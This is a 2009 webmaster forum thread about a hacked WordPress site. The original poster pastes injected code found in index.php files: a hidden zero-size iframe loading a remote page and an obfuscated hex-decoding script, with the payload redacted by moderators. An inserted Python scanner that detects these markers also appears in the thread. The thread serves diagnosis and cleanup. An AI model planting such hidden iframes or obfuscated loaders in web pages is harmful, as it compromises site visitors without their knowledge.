
HTML Forum

    
wordpress hacked?
tomhumf

5+ Year Member



 
Msg#: 3914958 posted 2:51 pm on May 16, 2009 (gmt 0)

Hi,

I've recently set up a WordPress site and it was working fine. Today however, it is constantly receiving and transmitting data from <a certain domain> and I don't know what this is?

I found the code below AFTER the </html> tags in the source code. It isn't in the WordPress footer so I'm not sure how it is getting there...

Any ideas how to get rid? I installed a couple of plugins, maybe this caused it.

///////////////////////////////

I just found the code hidden in the main index.php files of the WordPress installation and deleted them out. It's working for now... I need to read the 'securing wordpress' thread

<iframe src="http://example.net/yes/index.php" width="0" height="0" style="display:none;"></iframe><script>function v4a0e9cd17b16a(v4a0e9cd17b553){ function v4a0e9cd17b93a () {var v4a0e9cd17bd23=16; return v4a0e9cd17bd23;} return(parseInt(v4a0e9cd17b553,v4a0e9cd17b93a()));}function v4a0e9cd17c10a(v4a0e9cd17c4f2){ var v4a0e9cd17d0a9=2; var v4a0e9cd17c8db='';for(v4a0e9cd17ccc2=0; v4a0e9cd17ccc2<v4a0e9cd17c4f2.length; v4a0e9cd17ccc2+=v4a0e9cd17d0a9){ v4a0e9cd17c8db+=(String.fromCharCode(v4a0e9cd17b16a(v4a0e9cd17c4f2.substr(v4a0e9cd17ccc2, v4a0e9cd17d0a9))));}return v4a0e9cd17c8db;} document.write(v4a0e9cd17c10a('[long alphanumeric string]'));></script>

[edited by: tedster at 4:27 pm (utc) on May 16, 2009]

[edited by: encyclo at 12:43 am (utc) on June 3, 2009]
[edit reason] obscure parts of the code, for safety [/edit]

 

tedster

WebmasterWorld Senior Member tedster is a WebmasterWorld Top Contributor of All Time 10+ Year Member



 
Msg#: 3914958 posted 4:32 pm on May 16, 2009 (gmt 0)

Glad you got it fixed. Now, as you said, it's time to secure your WordPress installation. There is a whole lot of server hacking these days, especially for WordPress.

There's a thread in the Google Search forum that covers hacked servers [webmasterworld.com]. There are many different varieties, and they can kill your search traffic.

tomhumf

5+ Year Member



 
Msg#: 3914958 posted 6:39 pm on May 16, 2009 (gmt 0)

I found the code in 3 index.php files in WordPress. Would my log files show exactly which files were modified in the hack?

I find them hard to read with the Windows 'default log viewer'. Is there anything else I could use to read them more easily on Windows?
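
The following is an added example, not part of any post in this thread: a read-only scan of a WordPress directory for the three markers visible in the posted sample (content after `</html>`, a zero-size or `display:none` iframe, and a `document.write` call wrapping a hex string), which lists the affected files without relying on server logs. The function names and `SAMPLE` are assumptions made for illustration; the hex string is decoded statically and never executed.

```python
import re
import sys
from pathlib import Path

# Non-whitespace content after </html> (applies to saved page source, as first seen in the post).
AFTER_HTML = re.compile(r"</html\s*>\s*(\S.*)", re.I | re.S)
# An <iframe> hidden with zero size or display:none, as in the posted sample.
HIDDEN_IFRAME = re.compile(
    r"<iframe\b[^>]*(?:width=[\"']?0\b|height=[\"']?0\b|display\s*:\s*none)[^>]*>", re.I)
# document.write(fn('hexdigits')): the hex-pair decoder call in the posted sample.
HEX_WRITE = re.compile(r"document\.write\(\s*\w+\(\s*['\"]([0-9a-fA-F]{2,})['\"]\s*\)\s*\)")
# Constructed sample (not the thread's payload): a harmless string hex-encoded the same way.
SAMPLE = ("<html><body>ok</body></html>\n<script>document.write(dec('"
          + b'<iframe src="http://example.net/" width="0" height="0"></iframe>'.hex()
          + "'));</script>")


def decode_hex_pairs(blob):
    """Decode two hex digits per character, as the injected script does, without running it."""
    usable = len(blob) - len(blob) % 2
    return "".join(chr(int(blob[i:i + 2], 16)) for i in range(0, usable, 2))


def scan_text(text):
    """Return (finding, detail) tuples for one file's contents; detail is cut to 80 chars."""
    findings = []
    tail = AFTER_HTML.search(text)
    if tail:
        findings.append(("content-after-html", tail.group(1)[:80]))
    for m in HIDDEN_IFRAME.finditer(text):
        findings.append(("hidden-iframe", m.group(0)[:80]))
    for m in HEX_WRITE.finditer(text):
        findings.append(("hex-document-write", decode_hex_pairs(m.group(1))[:80]))
    return findings


def scan_tree(root):
    """Scan every .php file under root; return {path: findings} for files with hits."""
    hits = {}
    for path in Path(root).rglob("*.php"):
        found = scan_text(path.read_text(errors="replace"))
        if found:
            hits[str(path)] = found
    return hits


if __name__ == "__main__":
    for path, found in scan_tree(sys.argv[1] if len(sys.argv) > 1 else ".").items():
        for kind, detail in found:
            print(f"{path}: {kind}: {detail!r}")
```

Run it with the WordPress root as the only argument; comparing the flagged files against a fresh copy of the same WordPress release confirms what was changed.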

rickallen

10+ Year Member



 
Msg#: 3914958 posted 8:13 pm on Jun 2, 2009 (gmt 0)

I had a similar problem with code being added to index pages, but it turned out to be a server wide virus deal. If it comes back ask your hosting company about it.

I had a dedicated server and the "virus"/script trashed it.

webdesigncompany

5+ Year Member



 
Msg#: 3914958 posted 9:01 am on Jun 25, 2009 (gmt 0)

Hey guys, I have a problem with one of my WordPress blogs as well.

<snip>

It says

This blog has been archived or suspended for a violation of our

Any help would be good as I have lost that very good blog of mine.

[edited by: engine at 9:15 am (utc) on June 25, 2009]
[edit reason] No URLs, see WebmasterWorld TOS [/edit]

tedster

WebmasterWorld Senior Member tedster is a WebmasterWorld Top Contributor of All Time 10+ Year Member



 
Msg#: 3914958 posted 6:57 pm on Jun 25, 2009 (gmt 0)

Hello webdesigncompany, and welcome to the forums. Click on the link in my earlier post (the linked words are "hacked servers") and you'll find a very complete discussion.


All trademarks and copyrights held by respective owners. Member comments are owned by the poster.
WebmasterWorld is a Developer Shed Community owned by Jim Boykin.
© Webmaster World 1996-2014 all rights reserved